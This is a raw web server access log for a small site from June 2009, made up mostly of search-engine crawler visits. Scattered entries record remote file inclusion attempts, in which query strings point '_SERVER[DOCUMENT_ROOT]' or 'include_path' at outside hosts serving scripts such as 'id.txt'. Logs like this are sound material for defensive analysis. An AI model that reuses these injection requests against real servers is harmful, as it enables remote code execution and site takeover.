220.181.61.214 - - [17/Jun/2009:02:07:26 +0100] "GET / HTTP/1.1" 304 - "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 402 216
66.249.66.233 - - [17/Jun/2009:02:27:09 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.66.233 - - [17/Jun/2009:02:27:09 +0100] "GET /webalizer/usage_200610.html HTTP/1.1" 200 107332 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 107694
208.80.195.51 - - [17/Jun/2009:03:06:42 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; SV1; yie6; YPC 3.2.0; .NET CLR 1.1.4322)" 176 1587
216.129.119.14 - - [17/Jun/2009:03:20:40 +0100] "GET /webalizer/usage_200610.html\\r HTTP/1.0" 404 376 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 218 622
66.249.66.233 - - [17/Jun/2009:03:30:54 +0100] "GET /no-text6785842006057960653 HTTP/1.1" 404 373 "-" "Googlebot-Image/1.0" 254 657
66.249.66.233 - - [17/Jun/2009:05:02:07 +0100] "GET /index HTTP/1.1" 404 352 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 236 636
66.249.66.233 - - [17/Jun/2009:05:47:03 +0100] "GET /hsa7.jpg HTTP/1.1" 404 355 "-" "Googlebot-Image/1.0" 236 639
66.249.66.233 - - [17/Jun/2009:06:08:39 +0100] "GET /hs01.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 255
66.249.66.233 - - [17/Jun/2009:08:31:29 +0100] "GET /no-text-6295002347118144649 HTTP/1.1" 404 374 "-" "Googlebot-Image/1.0" 255 658
66.249.66.233 - - [17/Jun/2009:09:26:18 +0100] "GET /hs19.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 256
216.129.119.14 - - [17/Jun/2009:09:34:47 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
124.115.0.23 - - [17/Jun/2009:09:35:26 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
66.249.66.233 - - [17/Jun/2009:10:47:40 +0100] "GET /no-text-5894454082109235368 HTTP/1.1" 404 374 "-" "Googlebot-Image/1.0" 255 658
66.249.66.233 - - [17/Jun/2009:11:03:44 +0100] "GET /webalizer/usage_200906.html HTTP/1.1" 200 143214 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 143578
66.249.66.233 - - [17/Jun/2009:11:52:26 +0100] "GET /bs17.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 256
66.249.66.233 - - [17/Jun/2009:13:18:48 +0100] "GET /bs15.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 256
93.158.151.24 - - [17/Jun/2009:13:35:09 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "YandexSomething/1.0" 136 641
66.249.66.233 - - [17/Jun/2009:15:06:46 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Googlebot-Image/1.0" 205 641
66.249.66.233 - - [17/Jun/2009:15:06:46 +0100] "GET /hs10.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 254
91.210.175.22 - - [17/Jun/2009:15:38:07 +0100] "GET /dec4b.swf HTTP/1.0" 200 7503350 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" 390 285000
91.210.175.148 - - [17/Jun/2009:17:48:34 +0100] "GET /dec4b.swf HTTP/1.0" 200 7503350 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" 390 62000
216.129.119.14 - - [17/Jun/2009:17:55:00 +0100] "GET /webalizer/usage_200804.html HTTP/1.0" 200 61230 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 61553
66.249.66.233 - - [17/Jun/2009:19:00:40 +0100] "GET /log/error.log.4 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 296 255
66.249.66.233 - - [17/Jun/2009:19:29:05 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 240 7503735
216.129.119.14 - - [17/Jun/2009:20:54:40 +0100] "GET /index HTTP/1.0" 404 352 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 194 598
66.249.66.233 - - [17/Jun/2009:23:19:23 +0100] "GET /no-text-6321860259427241784 HTTP/1.1" 404 374 "-" "Googlebot-Image/1.0" 255 658
124.115.2.231 - - [17/Jun/2009:23:29:59 +0100] "GET /robots.txt HTTP/1.1" 404 357 "http://www.decodeine.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 242 641
208.80.195.34 - - [17/Jun/2009:23:31:59 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; ESB{860D4D74-E89A-4DA5-A3C2-9D060391099F}; .NET CLR 1.0.3705)" 198 1587
93.158.151.24 - - [18/Jun/2009:00:44:58 +0100] "GET / HTTP/1.1" 200 1266 "-" "YandexSomething/1.0" 431 1625
74.6.18.223 - - [18/Jun/2009:03:51:39 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.18.223 - - [18/Jun/2009:03:51:39 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 365 1587
38.103.63.62 - - [18/Jun/2009:04:44:22 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 348 603
38.103.63.62 - - [18/Jun/2009:04:52:36 +0100] "GET / HTTP/1.1" 200 1266 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 338 1587
213.189.224.21 - - [18/Jun/2009:05:34:54 +0100] "GET /log/error.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 363 "-" "Mozilla/5.0" 238 609
213.189.224.21 - - [18/Jun/2009:05:34:54 +0100] "GET /log/?_SERVER[DOCUMENT_ROOT]=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 3184 "-" "Mozilla/5.0" 222 3418
213.189.224.21 - - [18/Jun/2009:05:34:54 +0100] "GET /?_SERVER[DOCUMENT_ROOT]=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 1266 "-" "Mozilla/5.0" 218 1587
213.189.224.21 - - [18/Jun/2009:05:34:54 +0100] "GET /log/web.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 361 "-" "Mozilla/5.0" 236 607
125.140.142.39 - - [18/Jun/2009:05:49:11 +0100] "GET /?_SERVER[DOCUMENT_ROOT]=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 1266 "-" "Mozilla/5.0" 190 1587
125.140.142.39 - - [18/Jun/2009:05:49:11 +0100] "GET /log/error.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 363 "-" "Mozilla/5.0" 210 609
125.140.142.39 - - [18/Jun/2009:05:49:14 +0100] "GET /log/?_SERVER[DOCUMENT_ROOT]=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 3184 "-" "Mozilla/5.0" 194 3418
125.140.142.39 - - [18/Jun/2009:05:49:36 +0100] "GET /log/web.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 361 "-" "Mozilla/5.0" 208 607
124.115.4.194 - - [18/Jun/2009:07:56:11 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
74.6.18.223 - - [18/Jun/2009:08:11:41 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.18.223 - - [18/Jun/2009:08:11:41 +0100] "GET /log/web.log HTTP/1.0" 200 1453842 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 376 1454173
66.249.66.233 - - [18/Jun/2009:09:23:14 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Googlebot-Image/1.0" 205 641
66.249.66.233 - - [18/Jun/2009:09:23:14 +0100] "GET /hs19.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 255
66.249.66.233 - - [18/Jun/2009:09:39:38 +0100] "GET /bs15.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 256
66.249.66.233 - - [18/Jun/2009:10:12:28 +0100] "GET /ob8.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 235 256
216.129.119.14 - - [18/Jun/2009:10:14:06 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
66.249.66.233 - - [18/Jun/2009:10:32:09 +0100] "GET /hs10.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 255
66.249.66.233 - - [18/Jun/2009:11:03:43 +0100] "GET /webalizer/usage_200906.html HTTP/1.1" 200 144048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 353 144412
121.189.59.237 - - [18/Jun/2009:12:01:20 +0100] "GET /log/?_SERVER[DOCUMENT_ROOT]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 200 3184 "-" "Mozilla/5.0" 182 3418
121.189.59.237 - - [18/Jun/2009:12:01:20 +0100] "GET /?_SERVER[DOCUMENT_ROOT]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 200 1266 "-" "Mozilla/5.0" 178 1587
121.189.59.237 - - [18/Jun/2009:12:01:21 +0100] "GET /log/web.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 361 "-" "Mozilla/5.0" 196 607
121.189.59.237 - - [18/Jun/2009:12:01:24 +0100] "GET /?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 200 1266 "-" "libwww-perl/5.65" 174 1587
121.189.59.237 - - [18/Jun/2009:12:01:25 +0100] "GET /log/error.log/?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 361 "-" "libwww-perl/5.65" 188 607
121.189.59.237 - - [18/Jun/2009:12:01:25 +0100] "GET /log/web.log/?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 359 "-" "libwww-perl/5.65" 186 605
121.189.59.237 - - [18/Jun/2009:12:01:25 +0100] "GET /log/?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 200 3184 "-" "libwww-perl/5.65" 178 3418
121.189.59.237 - - [18/Jun/2009:12:01:30 +0100] "GET /?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 200 1266 "-" "libwww-perl/5.65" 174 1587
121.189.59.237 - - [18/Jun/2009:12:01:30 +0100] "GET /log/?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 200 3184 "-" "libwww-perl/5.65" 178 3418
121.189.59.237 - - [18/Jun/2009:12:01:31 +0100] "GET /log/error.log/?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 361 "-" "libwww-perl/5.65" 188 607
121.189.59.237 - - [18/Jun/2009:12:01:33 +0100] "GET /log/web.log/?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 359 "-" "libwww-perl/5.65" 186 605
66.249.66.233 - - [18/Jun/2009:13:06:24 +0100] "GET /bs17.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 256
58.61.164.207 - - [18/Jun/2009:14:46:57 +0100] "GET /robots.txt HTTP/1.1" 404 357 "http://www.decodeine.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 240 641
114.80.93.71 - - [18/Jun/2009:14:51:59 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
220.181.61.234 - - [18/Jun/2009:19:13:31 +0100] "GET / HTTP/1.1" 200 1266 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 275 1587
66.249.66.233 - - [18/Jun/2009:19:58:10 +0100] "GET /webalizer/usage_200804.html HTTP/1.1" 200 61230 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 61591
208.80.195.45 - - [18/Jun/2009:20:19:16 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YComp 5.0.0.0; .NET CLR 1.0.3705; HbTools 4.7.1; .NET CLR 1.1.4322)" 175 1587
219.234.81.33 - - [18/Jun/2009:20:26:29 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Avant Browser; InfoPath.1; .NET CLR 2.0.50727; .NET CLR1.1.4322)" 376 1587
219.234.81.33 - - [18/Jun/2009:20:26:34 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "-" 73 584
88.131.106.11 - - [18/Jun/2009:21:46:12 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" 199 603
88.131.106.11 - - [18/Jun/2009:21:46:12 +0100] "GET / HTTP/1.0" 304 - "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" 239 216
24.5.10.141 - - [18/Jun/2009:22:23:44 +0100] "GET / HTTP/1.1" 200 1266 "http://www.chimehost.com/web_hosting/web_hosting.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 266 1568
24.192.141.207 - - [18/Jun/2009:22:23:44 +0100] "GET / HTTP/1.1" 200 1266 "http://www.chimehost.com/services.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 251 1568
82.38.36.37 - - [18/Jun/2009:22:28:35 +0100] "GET / HTTP/1.1" 200 1266 "http://phphost.uk-plc.net/~ed/sites.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-GB; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11" 433 1625
82.38.36.37 - - [18/Jun/2009:22:28:35 +0100] "GET /indexbutton.jpg HTTP/1.1" 200 153759 "http://www.decodeine.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-GB; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11" 403 154123
82.38.36.37 - - [18/Jun/2009:22:28:35 +0100] "GET /index.jpg HTTP/1.1" 200 225683 "http://www.decodeine.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-GB; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11" 397 226046
82.38.36.37 - - [18/Jun/2009:22:28:36 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-GB; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11" 363 641
82.38.36.37 - - [18/Jun/2009:22:28:37 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-GB; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11" 393 641
66.249.66.233 - - [18/Jun/2009:23:02:44 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Googlebot-Image/1.0" 205 641
66.249.66.233 - - [18/Jun/2009:23:02:45 +0100] "GET /ob13.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 255
208.115.111.250 - - [19/Jun/2009:01:57:29 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" 249 584
208.115.111.250 - - [19/Jun/2009:03:23:58 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" 239 1568
58.61.164.40 - - [19/Jun/2009:04:42:50 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
124.115.1.8 - - [19/Jun/2009:04:46:02 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.139 - - [19/Jun/2009:04:47:13 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
124.115.1.7 - - [19/Jun/2009:04:49:01 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.39 - - [19/Jun/2009:04:55:00 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.141 - - [19/Jun/2009:04:57:02 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.140 - - [19/Jun/2009:05:01:53 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
124.115.4.194 - - [19/Jun/2009:07:16:25 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
66.249.66.233 - - [19/Jun/2009:07:58:49 +0100] "GET /ob17.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 256
66.249.66.233 - - [19/Jun/2009:08:51:07 +0100] "GET /hs09.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 255
87.230.22.39 - - [19/Jun/2009:09:19:55 +0100] "GET //guestbook1//admin.php?include_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 368 "-" "Mozilla/5.0" 190 614
87.230.22.39 - - [19/Jun/2009:09:19:55 +0100] "GET /log//guestbook1//admin.php?include_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 373 "-" "Mozilla/5.0" 194 619
123.143.98.5 - - [19/Jun/2009:09:23:06 +0100] "GET //guestbook1//admin.php?include_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 368 "-" "Mozilla/5.0" 197 614
123.143.98.5 - - [19/Jun/2009:09:23:06 +0100] "GET /log//guestbook1//admin.php?include_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 373 "-" "Mozilla/5.0" 201 619
123.143.98.5 - - [19/Jun/2009:09:23:25 +0100] "GET //guestbook1//admin.php?include_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 368 "-" "Mozilla/5.0" 197 614
123.143.98.5 - - [19/Jun/2009:09:23:25 +0100] "GET /log//guestbook1//admin.php?include_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 373 "-" "Mozilla/5.0" 201 619
66.249.66.233 - - [19/Jun/2009:10:17:24 +0100] "GET /o8.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 234 283
216.129.119.14 - - [19/Jun/2009:10:46:43 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
66.249.66.233 - - [19/Jun/2009:11:04:12 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.66.233 - - [19/Jun/2009:11:04:13 +0100] "GET /webalizer/usage_200906.html HTTP/1.1" 200 144936 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 145299
114.80.93.71 - - [19/Jun/2009:11:13:33 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
66.249.66.233 - - [19/Jun/2009:12:49:05 +0100] "GET /oba4.jpg HTTP/1.1" 404 355 "-" "Googlebot-Image/1.0" 236 639
66.249.66.233 - - [19/Jun/2009:14:41:51 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 231 1625
208.80.195.37 - - [19/Jun/2009:15:49:09 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {0899729F-EA47-A03E-3554-BF860857374F}; Mozilla/4.0(Compatible Mozilla/4.0(Compatible-EmbeddedWB 14.57 http://bsalsa.com/ EmbeddedWB- 14.57 from: http://bsalsa.com/ ; .NET CLR 2.0.50727)" 295 1587
66.249.66.233 - - [19/Jun/2009:17:01:30 +0100] "GET /log/error.log HTTP/1.1" 200 184426 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 244 184791
58.61.164.207 - - [19/Jun/2009:17:06:49 +0100] "GET /robots.txt HTTP/1.1" 404 357 "http://www.decodeine.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 240 641
66.249.66.233 - - [19/Jun/2009:21:54:25 +0100] "GET /bs06.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 256
66.249.66.233 - - [19/Jun/2009:22:59:28 +0100] "GET /feidad.html HTTP/1.1" 200 820 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 242 1178
66.249.66.233 - - [20/Jun/2009:00:04:20 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Googlebot-Image/1.0" 205 641
66.249.66.233 - - [20/Jun/2009:00:04:21 +0100] "GET /bs04.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 255
123.125.64.15 - - [20/Jun/2009:02:27:09 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 182 603
220.181.7.23 - - [20/Jun/2009:02:35:55 +0100] "GET / HTTP/1.1" 200 1266 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 195 1587
216.129.119.14 - - [20/Jun/2009:03:19:05 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 189 1587
66.249.66.233 - - [20/Jun/2009:03:45:34 +0100] "GET /hs12.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 256
66.249.66.233 - - [20/Jun/2009:04:13:40 +0100] "GET /no-text2961802667084761382 HTTP/1.1" 404 373 "-" "Googlebot-Image/1.0" 254 657
58.61.164.40 - - [20/Jun/2009:05:35:10 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
124.115.1.7 - - [20/Jun/2009:05:39:00 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.139 - - [20/Jun/2009:05:42:38 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
124.115.1.8 - - [20/Jun/2009:05:44:29 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.141 - - [20/Jun/2009:05:48:12 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.140 - - [20/Jun/2009:05:58:08 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.39 - - [20/Jun/2009:06:00:59 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
124.115.4.194 - - [20/Jun/2009:06:41:39 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
216.129.119.14 - - [20/Jun/2009:10:14:50 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
220.181.7.38 - - [20/Jun/2009:10:24:45 +0100] "GET / HTTP/1.1" 200 1266 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 195 1587
220.181.7.26 - - [20/Jun/2009:10:39:25 +0100] "GET /feidad.html HTTP/1.1" 200 820 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 206 1140
66.249.66.233 - - [20/Jun/2009:11:05:08 +0100] "GET /webalizer/usage_200906.html HTTP/1.1" 200 145849 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 146213
208.80.195.32 - - [20/Jun/2009:12:15:55 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; eBook; .NET CLR 1.1.4322)" 133 1587
66.249.66.233 - - [20/Jun/2009:12:39:18 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Googlebot-Image/1.0" 205 641
66.249.66.233 - - [20/Jun/2009:12:39:18 +0100] "GET /no-text-1064409514662711097 HTTP/1.1" 404 374 "-" "Googlebot-Image/1.0" 255 657
66.249.66.233 - - [20/Jun/2009:16:37:43 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 240 7503735
66.249.66.233 - - [20/Jun/2009:17:10:10 +0100] "GET /log/web.log.5 HTTP/1.1" 200 2798 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 244 3159
66.249.66.233 - - [20/Jun/2009:17:53:56 +0100] "GET /log/web.log.4 HTTP/1.1" 200 4090 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 244 4451
66.249.66.233 - - [20/Jun/2009:18:21:57 +0100] "GET /log/web.log.2 HTTP/1.1" 200 5490 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 244 5851
66.249.66.233 - - [20/Jun/2009:18:27:12 +0100] "GET /webalizer/usage_200901.html HTTP/1.1" 200 158400 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 158764
193.47.80.50 - - [20/Jun/2009:19:44:06 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 260 603
193.47.80.50 - - [20/Jun/2009:19:44:07 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 342 216
58.61.164.207 - - [20/Jun/2009:20:28:52 +0100] "GET /robots.txt HTTP/1.1" 404 357 "http://www.decodeine.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 240 641
85.195.122.16 - - [20/Jun/2009:20:39:14 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "192.comAgent" 102 584
66.249.66.233 - - [20/Jun/2009:21:02:47 +0100] "GET /webalizer/usage_200812.html HTTP/1.1" 200 153211 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 153574
220.181.7.14 - - [20/Jun/2009:22:23:49 +0100] "GET / HTTP/1.1" 200 1266 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 195 1587
218.186.12.231 - - [21/Jun/2009:00:03:54 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "nutch.us/Nutch-1.0 (www.nutch.us; crawler@nutch.us)" 158 603
